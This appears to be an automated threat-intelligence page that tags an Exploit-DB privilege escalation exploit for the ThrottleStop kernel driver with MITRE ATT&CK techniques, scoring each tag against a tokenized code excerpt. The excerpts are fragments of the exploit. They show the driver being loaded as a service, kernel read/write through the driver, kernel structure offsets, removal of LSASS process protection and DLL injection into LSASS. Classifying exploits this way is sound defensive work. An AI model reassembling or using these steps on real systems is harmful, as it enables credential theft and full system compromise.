TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Exploit-DB

[local] Throttlestop Kernel Driver - Kernel Out-of-Bounds Write Privilege Escalation

2026-04-22 · Read original ↗

ATT&CK techniques detected

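12 predictions (each entry lists a technique, a percentage score, and a quoted excerpt; a technique can appear more than once when it is paired with different excerpts)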
T1068 — Exploitation for Privilege Escalation
99%
"[ local ] throttlestop kernel driver - kernel out - of - bounds write privilege escalation throttlestop kernel driver - kernel out - of - bounds write privilege escalation # exploit title : throttlestop kernel driver - kernel out - of - bounds write privilege escalation # exploit…"
T1003.001 — LSASS Memory
95%
"searchprocesspid = xread ( hdrv, ( uint64 _ t ) searcheprocess + 0x2e0 ) ; / / + 0x2e0 uniqueprocessid : ptr64 void if ( searchprocesspid = = lsasspid ) / / lsass process { break ; } } printf ( " [ + ] found lsass eprocess! \ n " ) ; printf ( " [ + ] removing ppl protection... \ …"
T1055.001 — Dynamic-link Library Injection
89%
"##el : uchar printf ( " [ + ] lsass protections disabled \ n " ) ; closehandle ( hdrv ) ; security _ package _ options spo = { } ; security _ status ss = addsecuritypackagea ( ( lpstr ) " c : \ \ windows \ \ system32 \ \ ntssp. dll ", & spo ) ; printf ( " [ + ] dll injection succ…"
T1055.001 — Dynamic-link Library Injection
81%
"##ror ( ) ) ; } else { printf ( " [ + ] service started correctly. \ n " ) ; } lpvoid nt _ base = getbaseaddr ( l " ntoskrnl. exe " ) ; printf ( " [ + ] nt base : % p \ n ", nt _ base ) ; handle hdrv = null ; hdrv = createfilea ( " \ \ \ \. \ \ throttlestop ", ( generic _ read | …"
T1543.003 — Windows Service
78%
"! ] error opening scm : % lu \ n ", getlasterror ( ) ) ; return 1 ; } / / create the service hservice = createservice ( hscmanager, l " throttlestop ", l " throttlestop ", service _ all _ access, service _ kernel _ driver, service _ auto _ start, service _ error _ normal, l " c :…"
T1569.002 — Service Execution
74%
"! ] error opening scm : % lu \ n ", getlasterror ( ) ) ; return 1 ; } / / create the service hservice = createservice ( hscmanager, l " throttlestop ", l " throttlestop ", service _ all _ access, service _ kernel _ driver, service _ auto _ start, service _ error _ normal, l " c :…"
T1055.001 — Dynamic-link Library Injection
66%
"searchprocesspid = xread ( hdrv, ( uint64 _ t ) searcheprocess + 0x2e0 ) ; / / + 0x2e0 uniqueprocessid : ptr64 void if ( searchprocesspid = = lsasspid ) / / lsass process { break ; } } printf ( " [ + ] found lsass eprocess! \ n " ) ; printf ( " [ + ] removing ppl protection... \ …"
T1057 — Process Discovery
54%
"0x % llx \ n ", ok, br, getlasterror ( ), ( unsigned long long ) out ) ; if ( ok & & br = = 8 & & out ) { ulonglong result = * ( volatile ulonglong * ) ( uintptr _ t ) out ; / / 8 bytes exactos } / / write printf ( " [ + ] write what : 0x % 016llx | where : 0x % 016llx \ n ", ( u…"
T1057 — Process Discovery
48%
"##rocess = ulonglong ( nt _ base ) + 0x5412e0 ; dword64 eprocess = xread ( hdrv, ( uint64 _ t ) system _ eprocess ) ; printf ( " [ + ] eprocess : 0x % llx \ n ", eprocess ) ; dword64 currentprocesspid = xread ( hdrv, ( uint64 _ t ) system _ eprocess + 0x2e0 ) ; / / + 0x2e0 unique…"
T1003.001 — LSASS Memory
48%
"sizeof ( processentry32w ) ; if ( process32firstw ( snapshot, & entry ) ) { do { if (! _ wcsicmp ( entry. szexefile, processname. c _ str ( ) ) ) { processid = entry. th32processid ; break ; } } while ( process32nextw ( snapshot, & entry ) ) ; } closehandle ( snapshot ) ; return …"
T1055.001 — Dynamic-link Library Injection
42%
"##rocess = ulonglong ( nt _ base ) + 0x5412e0 ; dword64 eprocess = xread ( hdrv, ( uint64 _ t ) system _ eprocess ) ; printf ( " [ + ] eprocess : 0x % llx \ n ", eprocess ) ; dword64 currentprocesspid = xread ( hdrv, ( uint64 _ t ) system _ eprocess + 0x2e0 ) ; / / + 0x2e0 unique…"
T1055.001 — Dynamic-link Library Injection
35%
"sizeof ( processentry32w ) ; if ( process32firstw ( snapshot, & entry ) ) { do { if (! _ wcsicmp ( entry. szexefile, processname. c _ str ( ) ) ) { processid = entry. th32processid ; break ; } } while ( process32nextw ( snapshot, & entry ) ) ; } closehandle ( snapshot ) ; return …"

Summary

Throttlestop Kernel Driver - Kernel Out-of-Bounds Write Privilege Escalation